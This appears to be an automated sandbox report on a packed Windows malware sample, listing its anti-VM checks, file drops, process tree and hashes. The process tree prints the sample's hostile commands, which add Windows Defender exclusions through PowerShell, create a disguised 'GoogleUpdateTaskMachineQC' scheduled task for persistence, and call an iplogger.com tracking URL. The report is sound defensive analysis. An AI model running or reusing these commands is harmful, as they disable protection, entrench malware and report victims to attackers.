Analysis
-
max time kernel
122s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05/04/2024, 01:49
Behavioral task
behavioral1
Sample
5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
Resource
win7-20240221-en
General
-
Target
5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
-
Size
10.2MB
-
MD5
d21a17b082c180ab291d60acd6472c08
-
SHA1
221a714c7ea143399c9dad504b12b29be2f62bc9
-
SHA256
5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6
-
SHA512
92c458492154aa35c5e03f313e59c4b0ebe5eb8a71643ca74e0b20d48a4a74ca1806599cfd2c096c74c3022885ead8e7ec1caf13852fea400b85d615c2639448
-
SSDEEP
196608:/H4wkCR3Peo3+hwP4Ff8Qg+rho+hs8sZbLV2dfN+zvidCGVgaYXMB0lvbWDjpqHi:/4wkCd3+hDEQLbs8ybLu4Did5gaYXMB1
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 2456 created 1204 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 21 PID 2456 created 1204 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 21 PID 2456 created 1204 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 21 PID 2456 created 1204 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 21 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe -
resource yara_rule behavioral1/memory/2456-0-0x0000000140000000-0x00000001412EC000-memory.dmp themida behavioral1/memory/2456-2-0x0000000140000000-0x00000001412EC000-memory.dmp themida behavioral1/memory/2456-3-0x0000000140000000-0x00000001412EC000-memory.dmp themida behavioral1/memory/2456-10-0x0000000140000000-0x00000001412EC000-memory.dmp themida behavioral1/memory/2456-38-0x0000000140000000-0x00000001412EC000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2836 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 2696 powershell.exe 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 2456 5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe 980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 980 powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1204
-
C:\Users\Admin\AppData\Local\Temp\5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe"C:\Users\Admin\AppData\Local\Temp\5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"2⤵PID:2416
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\bicubkbzonui.xml"2⤵
- Creates scheduled task(s)
PID:2836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest -Uri "https://iplogger.com/ZvWn8"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5546d67a48ff2bf7682cea9fac07b942e
SHA1a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA51210d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD534f3f6a42348021853378bb2dd0ad017
SHA1aad886840a30d22757d0c69d785385bff1c3c535
SHA256a07cd3528ba577c4649de1fe90fa2548ec6d14af45a8d063c9b121795300ec7d
SHA51251b226d81cb68962fbfbc8f0982b31f0855ba77c36e8dd62bf6cc4d8c651c54e3ef865c262bcdff07a2c052b4d657ea4448a43984377dd71907caad41e5bc893